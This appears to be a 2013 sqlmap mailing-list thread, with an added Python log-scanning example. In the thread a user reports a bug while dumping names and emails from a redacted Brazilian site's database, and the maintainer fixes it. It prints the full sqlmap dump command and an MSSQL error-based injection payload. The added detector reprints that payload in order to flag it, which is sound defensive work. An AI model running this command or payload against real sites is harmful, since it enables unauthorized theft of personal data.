Re: [sqlmap-users] payload problem? "Incorrect syntax near"
From: Vinicius Da L. <vin...@gm...> - 2013-11-12 20:45:15
Confirmed fixed! You rock! Thanks!

2013/11/12 Miroslav Stampar <mir...@gm...>

> Hi.
>
> Could you please update and retry it now?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Tue, Nov 12, 2013 at 2:13 PM, Vinicius Da Loop <vin...@gm...> wrote:
>
>> Hello,
>>
>> Listing the DBs is OK, listing tables and columns is OK, but when I try to
>> dump the contents, I get an 'Incorrect syntax' error in the HTML response,
>> so I suspect that something is wrong with the payload sent by sqlmap:
>>
>> ./sqlmap.py -u "http://www.[snip].br/noticias/[snip].asp?ID=4416"
>> --random-agent --threads=1 --technique=E -D 057 -T Cadastro -C
>> CAD_ID,CAD_Nome,CAD_Email --dump -v 6
>>
>> [PAYLOAD] 4416 AND 9709=CONVERT(INT,(SELECT
>> CHAR(113)+CHAR(119)+CHAR(122)+CHAR(114)+CHAR(113)+(SELECT
>> ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> 057.dbo.Cadastro)+CHAR(113)+CHAR(115)+CHAR(117)+CHAR(119)+CHAR(113)))
>>
>> [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 2 times
>>
>> HTML RESPONSE:
>>
>> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial"
>> size=2>error '80040e14'</font>
>> <p>
>> <font face="Arial" size=2>Line 1: Incorrect syntax near '057.'.</font>
>>
>> Any clue?
>> Thanks!
>
> --
> Miroslav Stampar
> http://about.me/stamparm
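For anyone reviewing web logs, the request quoted in this thread carries two visible traits: a number compared against `CONVERT(INT,(SELECT ...))`, and marker strings spelled out as `CHAR(n)+CHAR(n)` runs. The following is an added example, not part of the original messages and not sqlmap code; the log format, the path `/noticias/item.asp` and the client address are constructed assumptions.

```python
import re
from urllib.parse import quote, unquote_plus

# Runs such as CHAR(113)+CHAR(119)+...: strings built without quote characters.
CHAR_RUN = re.compile(r"(?:\bN?CHAR\(\s*\d+\s*\)\s*\+\s*)+N?CHAR\(\s*\d+\s*\)", re.I)
CHAR_ONE = re.compile(r"CHAR\(\s*(\d+)\s*\)", re.I)
# A number compared with CONVERT(INT,(SELECT ...)): the forced conversion error.
CONVERT_SUBQ = re.compile(r"\d+\s*=\s*CONVERT\(\s*INT\s*,\s*\(\s*SELECT\b", re.I)
# Assumed minimal access-log shape: "METHOD path?query HTTP/x.y" status
LOG_LINE = re.compile(r'"(?:GET|POST) (\S+?)\?(\S*) HTTP/[\d.]+" (\d{3})')

def _chr(n):
    """Map a code point to its character, tolerating out-of-range values."""
    return chr(n) if n < 0x110000 else "?"

def decode_char_runs(text):
    """Return the literal string spelled by each CHAR()+CHAR() run."""
    return ["".join(_chr(int(n)) for n in CHAR_ONE.findall(m.group(0)))
            for m in CHAR_RUN.finditer(text)]

def inspect_query(raw_query):
    """Classify one URL-encoded query string."""
    decoded = unquote_plus(raw_query)
    return {"convert_subquery": bool(CONVERT_SUBQ.search(decoded)),
            "markers": decode_char_runs(decoded)}

def scan(lines):
    """Return (path, status, markers) for requests showing both traits."""
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        result = inspect_query(m.group(2))
        if result["convert_subquery"] and result["markers"]:
            hits.append((m.group(1), int(m.group(3)), result["markers"]))
    return hits

# Payload text as quoted in the thread; the log lines around it are constructed.
PAYLOAD = ("4416 AND 9709=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(122)"
           "+CHAR(114)+CHAR(113)+(SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS "
           "NVARCHAR(4000)),CHAR(32)) FROM 057.dbo.Cadastro)+CHAR(113)+CHAR(115)"
           "+CHAR(117)+CHAR(119)+CHAR(113)))")
SAMPLE_LOG = [
    '203.0.113.7 - - "GET /noticias/item.asp?ID=4416 HTTP/1.1" 200',
    '203.0.113.7 - - "GET /noticias/item.asp?ID=%s HTTP/1.1" 500' % quote(PAYLOAD, safe=""),
]

if __name__ == "__main__":
    for path, status, markers in scan(SAMPLE_LOG):
        print(path, status, markers)
```

Pairing a hit with a 500 status, as in the thread, also points at an application that returns raw OLE DB error text to the client.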